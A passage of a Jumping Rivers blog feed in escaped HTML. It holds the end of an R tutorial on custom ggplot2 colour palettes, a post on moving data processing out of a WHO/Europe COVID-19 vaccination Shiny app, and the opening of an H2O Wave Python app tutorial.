&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;scale_colour_gradientn()&lt;/code&gt; function already has the aesthetic
argument set as &lt;code&gt;colour&lt;/code&gt; by default, so we don’t need to worry about
changing that. Again, the fill version of the function is analogous:
change the name of the function, and use &lt;code&gt;scale_fill_gradientn()&lt;/code&gt;
instead of &lt;code&gt;scale_colour_gradientn()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_fill_cvi_c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_gradientn&lt;/span&gt;(colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To ensure that the &lt;code&gt;scale_colour_*()&lt;/code&gt; functions work with either the
British or American spelling of colour, we can simply set one equal to
the other:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_color_cvi_d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scale_colour_cvi_d
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_color_cvi_c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scale_colour_cvi_c
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="testing-our-colour-palettes"&gt;Testing our colour palettes&lt;/h2&gt;
&lt;p&gt;Now that we have all the functions we need, we can call them in the same
way we would with any &lt;code&gt;scale_*()&lt;/code&gt; function in {ggplot2}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y), size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_cvi_c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;cvi_purples&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x), size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_cvi_d&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_favourite_colours&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/test-palette-plot-1.svg" title="Two charts side by side. On the left the points are coloured in gradients of purple. On the right, the bars in the bar chart are coloured in pink, green, and blue." alt="Two charts side by side. On the left the points are coloured in gradients of purple. On the right, the bars in the bar chart are coloured in pink, green, and blue." width="50%" style="display: block; margin: auto;" /&gt;
&lt;h2 id="extending-the-functionality-of-your-colour-palettes"&gt;Extending the functionality of your colour palettes&lt;/h2&gt;
&lt;p&gt;The colour palette functions we’ve defined here are fairly basic, and we
may want to add some additional functionality to them.&lt;/p&gt;
&lt;h3 id="printing-colour-palettes"&gt;Printing colour palettes&lt;/h3&gt;
&lt;p&gt;Users will often want to view the colours in a palette on their screen
&lt;em&gt;before&lt;/em&gt; they go to the effort of implementing it. Although this
technically isn’t necessary to make your colour palette work, it’s
extremely useful to anyone using it. Earlier, we defined the &lt;code&gt;palette&lt;/code&gt;
class, so we could create a function &lt;code&gt;print.palette()&lt;/code&gt; which
automatically prints a plot of any object with the class &lt;code&gt;palette&lt;/code&gt;.&lt;/p&gt;
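&lt;p&gt;As a minimal sketch of that idea, the method below draws one vertical
strip per colour and writes the palette name over the top. It assumes a
palette object is a character vector of hex colours with a &lt;code&gt;name&lt;/code&gt;
attribute and the class &lt;code&gt;palette&lt;/code&gt;; the &lt;code&gt;pal&lt;/code&gt; object and its hex
values are illustrative only, and your own palettes may be structured differently.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Illustrative palette object (assumed structure): hex colours, a name
# attribute, and the class &amp;#34;palette&amp;#34;.
pal = structure(c(&amp;#34;#702963&amp;#34;, &amp;#34;#637029&amp;#34;, &amp;#34;#296370&amp;#34;),
                name = &amp;#34;my_favourite_colours&amp;#34;, class = &amp;#34;palette&amp;#34;)

# S3 print method: one strip per colour, with the palette name in the centre.
print.palette = function(x, ...) {
  n = length(x)
  # Shrink the plot margins and restore them when the function exits.
  old_par = graphics::par(mar = c(0.5, 0.5, 0.5, 0.5))
  on.exit(graphics::par(old_par))
  graphics::image(1:n, 1, as.matrix(1:n), col = as.vector(x),
                  xlab = &amp;#34;&amp;#34;, ylab = &amp;#34;&amp;#34;, xaxt = &amp;#34;n&amp;#34;, yaxt = &amp;#34;n&amp;#34;, bty = &amp;#34;n&amp;#34;)
  graphics::text((n + 1) / 2, 1, labels = attr(x, &amp;#34;name&amp;#34;),
                 cex = 1.5, col = &amp;#34;white&amp;#34;)
  invisible(x)
}

pal  # auto-printing at the console dispatches to print.palette()
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Because R dispatches &lt;code&gt;print()&lt;/code&gt; on the class of an object, typing the
name of any &lt;code&gt;palette&lt;/code&gt; object at the console would then show the plot
rather than the raw hex codes.&lt;/p&gt;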
&lt;h3 id="turn-your-colour-palettes-into-an-r-package"&gt;Turn your colour palettes into an R package&lt;/h3&gt;
&lt;p&gt;If you have a collection of functions that work together and you need to
use them in multiple projects, it’s best (at least in the long run) to
turn them into an R package. All of the colour palettes I’ve used in my
work have been part of an R package. Making your palette functions into
a package also makes it easier to share them with other people (super
helpful if the colour palettes are for work).&lt;/p&gt;
&lt;p&gt;If you’ve never made an R package before, check out our previous blog
post on &lt;a href="https://www.jumpingrivers.com/blog/personal-r-package/" rel="external"&gt;Writing a Personal R
Package&lt;/a&gt; to help
you get started.&lt;/p&gt;
&lt;h3 id="discrete-vs-continuous-palettes"&gt;Discrete vs continuous palettes&lt;/h3&gt;
&lt;p&gt;Some of the colour palettes you define might work better for continuous
variables, and some may work better for discrete variables. At the
moment, any colour palette can be used for either discrete or continuous
variables at the user’s discretion. You may want to restrict which
palettes can be used with which type of variable, or at least show a
warning message to the user.&lt;/p&gt;
&lt;p&gt;For example, using the &lt;code&gt;my_favourite_colours&lt;/code&gt; palette doesn’t look very
nice when we interpolate the colours for a continuous palette.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_favourite_colours&amp;#34;&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;, n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/palette-gradient-1.svg" title="Colour palette showing three vertical strips of pink, green, and blue blended together in a gradient with the word my favourite colours in the centre" alt="Colour palette showing three vertical strips of pink, green, and blue blended together in a gradient with the word my favourite colours in the centre" width="50%" style="display: block; margin: auto;" /&gt;
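&lt;p&gt;One possible way to provide such a warning is sketched below. The
&lt;code&gt;palette_types&lt;/code&gt; lookup and the &lt;code&gt;check_palette_type()&lt;/code&gt; helper are
hypothetical names introduced for illustration, and the intended type
recorded for each palette is an assumption rather than part of the functions
defined in this post.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical lookup: the variable type each palette was designed for.
palette_types = list(
  cvi_purples = &amp;#34;continuous&amp;#34;,
  my_favourite_colours = &amp;#34;discrete&amp;#34;
)

# Warn (rather than stop) when a palette is used for the other type.
# Returns TRUE invisibly when no warning was needed, FALSE otherwise.
check_palette_type = function(name, type) {
  intended = palette_types[[name]]
  # Palettes without a recorded type are allowed for either use.
  if (is.null(intended)) {
    return(invisible(TRUE))
  }
  if (intended != type) {
    warning(&amp;#34;Palette '&amp;#34;, name, &amp;#34;' is intended for &amp;#34;, intended,
            &amp;#34; variables.&amp;#34;, call. = FALSE)
    return(invisible(FALSE))
  }
  invisible(TRUE)
}

check_palette_type(&amp;#34;my_favourite_colours&amp;#34;, type = &amp;#34;continuous&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A check like this could be called at the top of &lt;code&gt;cvi_palettes()&lt;/code&gt;.
Swapping &lt;code&gt;warning()&lt;/code&gt; for &lt;code&gt;stop()&lt;/code&gt; would turn the advice into a
hard restriction.&lt;/p&gt;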
&lt;h3 id="order-the-colours"&gt;Order the colours&lt;/h3&gt;
&lt;p&gt;By default, colours are returned in the order you define them in the
list. For continuous colour palettes this works quite well, as it
ensures colours go from light to dark, or vice versa. However, for
discrete palettes we may want to rearrange the colours to ensure greater
contrast between colours displayed next to each other. The
&lt;code&gt;cvi_palettes()&lt;/code&gt; function could be edited to return colours in a
different order if a discrete palette is chosen.&lt;/p&gt;
&lt;p&gt;Similarly, many colour palette functions include a &lt;code&gt;&amp;quot;direction&amp;quot;&lt;/code&gt; argument which
reverses the order in which the colours in the palette are used
e.g. going from light to dark instead of dark to light.&lt;/p&gt;
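&lt;p&gt;A minimal sketch of a direction option is shown below. The helper name
&lt;code&gt;order_colours()&lt;/code&gt; and the convention that &lt;code&gt;1&lt;/code&gt; keeps the defined
order while &lt;code&gt;-1&lt;/code&gt; reverses it are assumptions made for illustration;
the hex values are placeholders.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: direction = 1 keeps the defined order,
# direction = -1 reverses it. Any other value is an error.
order_colours = function(colours, direction = 1) {
  stopifnot(direction %in% c(1, -1))
  if (direction == -1) rev(colours) else colours
}

# Placeholder colours, returned in reverse order.
order_colours(c(&amp;#34;#381532&amp;#34;, &amp;#34;#702963&amp;#34;, &amp;#34;#a83e95&amp;#34;), direction = -1)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The same argument could be added to &lt;code&gt;cvi_palettes()&lt;/code&gt; and passed
through from each &lt;code&gt;scale_*()&lt;/code&gt; wrapper, so that users can flip a palette
without redefining it.&lt;/p&gt;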
&lt;h3 id="checking-for-colourblind-palettes"&gt;Checking for colourblind palettes&lt;/h3&gt;
&lt;p&gt;It’s a good idea to check if your colour palettes are colourblind
friendly, especially for discrete palettes. Sequential colour palettes
usually have a better chance of being colourblind friendly. &lt;a href="https://davidmathlogic.com/colorblind/#%23D81B60-%231E88E5-%23FFC107-%23004D40" rel="external"&gt;David
Nichols&lt;/a&gt;
provides a tool for seeing what your palettes may look like to people
who are colourblind. If you choose to include colour palettes that are
not colourblind friendly, it may be useful to include a warning for
users.&lt;/p&gt;
&lt;h2 id="final-thoughts"&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;By now, you should have the tools to create your own simple colour
palette functions for use with {ggplot2}. Most of the functions
described are based on those used in the
&lt;a href="https://github.com/BlakeRMills/MetBrewer" rel="external"&gt;{MetBrewer}&lt;/a&gt; and
&lt;a href="https://github.com/karthik/wesanderson" rel="external"&gt;{wesanderson}&lt;/a&gt; colour palette packages.
If you want to see examples of some of these extensions implemented in a
larger colour palette package, check out the source code for those
packages on GitHub.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Offload Shiny's Workload: COVID-19 processing for the WHO/Europe</title><link>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/</link><pubDate>Tue, 21 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we have a wealth of experience developing and
maintaining &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; applications. Over the
past year, we have been maintaining a Shiny
&lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" rel="external"&gt;application&lt;/a&gt;
for the World Health Organization Europe (WHO/Europe) that presents data
about COVID-19 vaccination uptake across Europe.&lt;/p&gt;
&lt;p&gt;The great strength of Shiny is that it simplifies the production of
data-focused web applications, making it relatively easy to present data
to users / clients in an interactive way. However, data can be big and
data-processing can be complex, time-consuming and memory-hungry. So if
you bake an entire data pipeline into a Shiny application, you may end
up with an application that is costly to host and doesn’t provide the
best user experience (slow, frequently crashes).&lt;/p&gt;
&lt;p&gt;One of the best tips for ensuring your application runs smoothly is
simple:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Do as little as possible.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is … make sure &lt;em&gt;your application&lt;/em&gt; does as little as possible.&lt;/p&gt;
&lt;p&gt;The data upon which the application is based comes from several sources,
across multiple countries, is frequently updated, and is constantly
evolving. When we joined this project, the integration of these datasets
was performed by the application itself. This meant that when a user
opened the app, multiple large datasets were downloaded, cleaned up, and
combined together—a process that might take several minutes—before the
user could see the first table.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-who-shiny-covid-maintenance-continuous-integration"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="do-as-little-processing-as-possible"&gt;Do as little processing as possible&lt;/h2&gt;
&lt;p&gt;A simple data-driven app may look as follows: it downloads some data,
processes that data and then presents a subset of the raw and processed
data to the user.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d1_simple_app.svg" title="Data is downloaded, processed, then presented by the app in both forms" alt="Data is downloaded, processed, then presented by the app in both forms" width="300px" height="350px" /&gt;
&lt;p&gt;The initial data processing steps may make the app very slow, and if it
is really sluggish, may mean that users close the app before it fully
loads.&lt;/p&gt;
&lt;p&gt;Since the data processing pipeline is encoded in the app, a simple way
to improve speed is for the app to cache any processed data. With the
cached, processed data in place, for most users the app would only need
to download or import the raw and the processed data, removing the
need for any data processing while the app is running. But suppose the
raw data has been updated. Then, when the next user opens the app, the
data-processing and uploading steps would run. That user would
have a poor experience, but most users wouldn’t.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d2_structure_before.svg" title="For some users, data-processing will occur before the app loads" alt="For some users, data-processing will occur before the app loads" width="300px" height="350px" /&gt;
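&lt;p&gt;The caching logic described above can be sketched roughly as follows.
This is an illustration only: it uses local files and modification times to
stand in for cloud storage, and &lt;code&gt;load_processed()&lt;/code&gt;, its arguments and the
&lt;code&gt;process&lt;/code&gt; function are hypothetical names rather than code from the
WHO/Europe app.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: reprocess only when the cache is missing or stale.
# `process` is any function that turns the raw file into processed data.
load_processed = function(raw_path, cache_path, process) {
  is_stale = !file.exists(cache_path)
  if (!is_stale) {
    # The cache is stale if the raw data was modified after it was written.
    is_stale = file.mtime(raw_path) &gt; file.mtime(cache_path)
  }
  if (is_stale) {
    # Slow path: only the first user after a data update pays this cost.
    processed = process(raw_path)
    saveRDS(processed, cache_path)
    return(processed)
  }
  # Fast path: most users just read the cached result.
  readRDS(cache_path)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With a structure like this the pipeline still lives inside the app, so
whichever session first sees the updated raw data has to wait for the slow
path to finish.&lt;/p&gt;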
&lt;p&gt;This was the structure of the WHO/Europe COVID-19 vaccination programme
monitoring application before we started working with it. Raw and
processed data were stored on an Azure server and the app ensured that
the processed data was kept in-sync with any updates to the raw data.
The whole data pipeline was only run a few times a week, because the raw
datasets were updated on a weekly basis. The load time for a typical
user was approximately 1 minute, whereas the first user after the raw
data had been updated may have to wait 3 or 4 minutes for the app to
load.&lt;/p&gt;
&lt;!---
In truth, it was probably pretty rare for a real user to wait that long, because the WHO
would run the app as soon as they had uploaded the new data to check that it had populated
content properly. But us poor developers had to wait a long time to check if our solutions
had really worked when fixing bugs in the app.
--&gt;
&lt;h2 id="transfer-as-little-data-as-possible"&gt;Transfer as little data as possible&lt;/h2&gt;
&lt;p&gt;Data is slow. So if you need lots of it, keep it close to you, and make
sure you only access the bits that you need.&lt;/p&gt;
&lt;!--- Where should data be stored if it doesn't need updating --&gt;
&lt;p&gt;There is a hierarchy of data speeds. For an app running on a server,
data-access is fastest when stored in memory, slower when stored on the
hard-drive, and much, much slower when it is accessed via the internet.
So, where possible, you should aim to store the data that is used within
an app on the server(s) from which the app is deployed.&lt;/p&gt;
&lt;p&gt;With Shiny apps, it is possible to bundle datasets alongside the source
code, such that wherever the app is deployed, those datasets are
available. A drawback of coupling the source code and data in this way,
is that the data would need to be kept in version control along with
your source code, and a new deployment of the app would be required
whenever the data is updated. So for datasets that are frequently
updated (as for the vaccination counts that underpin the WHO/Europe
app), this is impractical. But storing datasets alongside the source
code (or in a separate R package that is installed on the server) may be
valuable if those datasets are unlikely to change during the lifetime of
a project.&lt;/p&gt;
&lt;!--- Where should data be stored if it does need updating --&gt;
&lt;p&gt;For datasets that are large, or are frequently updated, cloud storage
may be the best solution. This allows collaborators to upload new data
on an ad-hoc basis without touching the app itself. The app would then
download data from the cloud for presentation during each user session.&lt;/p&gt;
&lt;!--- Partition the datasets --&gt;
&lt;p&gt;That solution might sound mildly inefficient. For each user that opens
the app, the same datasets are downloaded—likely, onto the same server.
How can we make this process more efficient? There are some rather
technical tips that might help—like using &lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;efficient file
formats&lt;/a&gt; to store large datasets,
&lt;a href="https://shiny.rstudio.com/articles/caching.html" rel="external"&gt;caching&lt;/a&gt; the data for
the app’s landing page, or using &lt;a href="https://rstudio.github.io/promises/articles/shiny.html" rel="external"&gt;asynchronous
computing&lt;/a&gt; to
initiate downloading the data while presenting a less data-intensive
landing page.&lt;/p&gt;
&lt;p&gt;A somewhat less technical solution is to identify precisely which
datasets are needed by the app and only download them.&lt;/p&gt;
&lt;p&gt;Imagine the raw datasets could be partitioned into:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;those that are only required when constructing a (possibly smaller)
processed dataset that is presented by the app; and&lt;/li&gt;
&lt;li&gt;those that are actually presented by the app.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If this can be done, nothing changes when the app runs the
whole data processing pipeline: both sets of raw data would still be
downloaded, and the processed data would be uploaded to the cloud. But
for most users the app would only download the processed datasets and
the second set of raw datasets.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d3_side_by_side.svg" title="Only one set of data is downloaded by most users" alt="Only one set of data is downloaded by most users" width="300px" height="350px" /&gt;
&lt;p&gt;In the COVID-19 vaccination programme monitoring app, evolving to this
state meant that two large files (~ 50MB in total) were no longer
downloaded per user session.&lt;/p&gt;
&lt;!---
Raw data:
- 29M (TESSy_eu.csv)
- 22M (eJRF *_covuptake.csv)
--&gt;
&lt;h2 id="do-as-little-processing-as-possible--in-the-app"&gt;Do as little processing as possible … in the app&lt;/h2&gt;
&lt;p&gt;In the above, we showed some steps that should reduce the amount of
processing and data transfer for a typical user of the app. With those
changes, the data processing pipeline was still inside the app. This is
undesirable. For some users, the whole data processing pipeline will run
during their session, which makes for a poor user experience. But it
also means that some user sessions need considerably more memory
and data transfer than others. If the data pipeline could
run outside of the app, these issues would be eased.&lt;/p&gt;
&lt;p&gt;If we move the data pipeline outside of the app, where should we move
it? It is possible to run processing scripts in a few places. For this
project, we chose to run the data processing pipeline on GitHub on a
daily schedule, as part of a GitHub Actions workflow. This was simply
because the source code is hosted there. GitLab, Bitbucket, Azure and
many other providers can run scripts in a similar way.&lt;/p&gt;
&lt;p&gt;So now, the data used within the app is processed on GitHub and uploaded
to Azure before it is needed by the app.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d4_github_processing.svg" title="Data is processed on GitHub and uploaded to Azure before it is needed by the app" alt="Data is processed on GitHub and uploaded to Azure before it is needed by the app" height="500px" /&gt;
&lt;p&gt;The combination of these changes meant that the WHO/Europe COVID-19
vaccination programme monitoring app, which previously took ~ 1min (and
occasionally ~ 4min) to load, now takes a matter of seconds.&lt;/p&gt;
&lt;h2 id="what-complexities-might-this-introduce"&gt;What complexities might this introduce?&lt;/h2&gt;
&lt;p&gt;In the simplest app presented here, all data processing was performed
whenever a new user session was started. The changes described have made
the app easier to use (from the user’s perspective) but mean that for
the developers, coordination between the different components must be
managed.&lt;/p&gt;
&lt;p&gt;For example, if the data team upload some new raw data, there should be
a mechanism to ensure that the data is processed and reaches the app in
a timely manner. If the source code for the app or the data processing
pipeline changes, the data processing pipeline should run afresh. If
changes to the structure of the raw dataset mean that the data
processing pipeline produces malformed processed data, there should be a
way to log that.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Working with the WHO/Europe COVID-19 vaccination programme monitoring
app has posed several challenges. The data upon which it is based is
constantly updated and has been restructured several times, consistent
with the challenges that the international community has faced. Here
we’ve outlined some steps that we followed to ensure that the data
underpinning this COVID-19 vaccination programme monitoring app is
presented to the community in an up-to-date and easy-to-access way. To
do this, we streamlined the app—making it do as little as possible when
a user is viewing it—by downloading only what it needs, and by removing
any extensive data processing.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Making a web application to display data with H2O Wave</title><link>https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/</link><pubDate>Thu, 16 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/final_app.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re used to coding in Python or R and want to write a web application quickly, you can avoid having to learn HTML, JavaScript, etc. by using H2O Wave to write your web application in Python or R. In this post we will go through an example of how to build a simple app that displays data in various forms, including plots, tables and graphics, using Python.&lt;/p&gt;
&lt;p&gt;If you have no experience with H2O Wave, I would strongly suggest going through their &lt;a href="https://wave.h2o.ai/docs/getting-started" rel="external"&gt;introductory tutorials and installation guide&lt;/a&gt; before continuing with this tutorial. They show you how to install H2O Wave and talk you through setting up basic apps, starting with the classic &amp;lsquo;Hello World&amp;rsquo; example that we all know and love.&lt;/p&gt;
&lt;p&gt;To start, I would suggest creating a Python script called &lt;code&gt;app.py&lt;/code&gt;; this is where we will write all of our code. To see how the app develops throughout this tutorial, we can run the following from the terminal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wave run app.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If this does not work, make sure you have &lt;code&gt;h2o_wave&lt;/code&gt; installed in the Python environment that you are using.&lt;/p&gt;
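&lt;p&gt;One quick way to check this is to ask the interpreter itself whether it can find the package. The snippet below is a minimal sketch using only the standard library; the helper name &lt;code&gt;is_installed()&lt;/code&gt; is our own and is not part of H2O Wave.&lt;/p&gt;

```python
from importlib.util import find_spec
import sys


def is_installed(module_name):
    """Return True if module_name can be imported by this interpreter."""
    return find_spec(module_name) is not None


# Show which interpreter is running and whether it can see h2o_wave
print(sys.executable)
print('h2o_wave installed:', is_installed('h2o_wave'))
```

&lt;p&gt;If the second line prints &lt;code&gt;False&lt;/code&gt;, the interpreter shown on the first line is the environment that still needs the package, which is typically installed with &lt;code&gt;pip install h2o-wave&lt;/code&gt;.&lt;/p&gt;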
&lt;h2 id="the-dataset"&gt;The dataset&lt;/h2&gt;
&lt;p&gt;For this tutorial we will be using an imaginary housing dataset which you can download from &lt;a href="https://www.kaggle.com/datasets/mssmartypants/paris-housing-price-prediction" rel="external"&gt;Kaggle&lt;/a&gt;. It gives a variety of information on housing stock (e.g. number of rooms, square footage, etc&amp;hellip;) and their pricing. We will make a simple app to display some of these data.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
